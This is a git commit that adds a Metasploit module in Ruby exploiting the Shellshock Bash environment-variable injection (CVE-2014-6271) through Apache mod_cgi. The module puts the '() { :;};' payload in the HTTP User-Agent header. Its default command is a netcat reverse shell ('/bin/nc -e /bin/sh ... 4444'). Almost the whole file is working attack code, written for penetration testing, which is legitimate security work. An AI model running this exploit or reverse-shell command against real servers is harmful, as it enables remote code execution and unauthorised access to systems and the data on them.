Land #3880, bash scanner module

2014-09-24 19:03:37 -05:00 · 2014-09-24 19:03:37 -05:00 · ff5398bf3f
parent 11b9a8a6ae a600a0655d
commit ff5398bf3f
1 changed files with 49 additions and 0 deletions
--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@ -0,0 +1,49 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
+      'Description' => %q{
+        This module exploits a code injection in specially crafted environment
+        variables in Bash, specifically targeting Apache mod_cgi scripts through
+        the HTTP_USER_AGENT variable.
+      },
+      'Author' => [
+        'Stephane Chazelas', # Vulnerability discovery
+        'wvu' # Metasploit module
+      ],
+      'References' => [
+        ['CVE', '2014-6271'],
+        ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
+        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
+      ],
+      'DisclosureDate' => 'Sep 24 2014',
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to CGI script']),
+      OptString.new('CMD', [true, 'Command to run (absolute paths required)',
+        '/bin/nc -e /bin/sh 127.0.0.1 4444 &'])
+    ], self.class)
+  end
+
+  def run_host(ip)
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'agent' => "() { :;}; #{datastore['CMD']}"
+    )
+  end
+
+end